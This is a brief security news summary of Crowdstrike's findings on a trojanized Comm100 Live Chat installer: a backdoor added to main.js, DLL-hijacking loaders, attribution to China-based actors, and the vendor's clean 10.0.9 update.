Crowdstrike recently published a report detailing a new supply chain attack on the installer of a popular commercial chat-based customer engagement platform to spread malware.
Key findings
The attack features a trojan malware delivered via an installer for Comm100’s Windows Desktop agent software named the Comm100 Live Chat. The variant reportedly remained active on Comm100’s website from September 26 to September 29.
The infected installer used a valid digital signature by Comm100 Network Corporation certificate allowing it to bypass antivirus solutions warnings during its launch.
The attackers implanted a JavaScript backdoor into the "main.js" file that is present in the Comm100 Live Chat installer versions 10.0.72 and 10.0.8.
The backdoor fetches a second-stage obfuscated JS script from a hard-coded URL, which enables the attackers to gain remote shell access to the victimized endpoints.
Post compromise activity
The attackers were observed deploying malicious loaders ("MidlrtMd.dll") that use the DLL order-hijacking technique to load the payload within Windows processes running directly from memory.
The malicious loader fetches the final payload (license) from the C2 and uses a hard-coded RC4 key to decrypt it.
Attribution
With moderate confidence, Crowdstrike researchers have attributed the attack to China-based threat actors based on the presence of Chinese-language comments in the malware, the use of Alibaba infrastructure to host servers, and other identical factors.
Closing thoughts
Comm100 has released the Live Chat application version 10.0.9, a clean installer, and recommended users update the Live Chat application immediately. The Canadian Center for Cybersecurity published an alert about the incident involving the trojanized version of the Comm100 Live Chat application.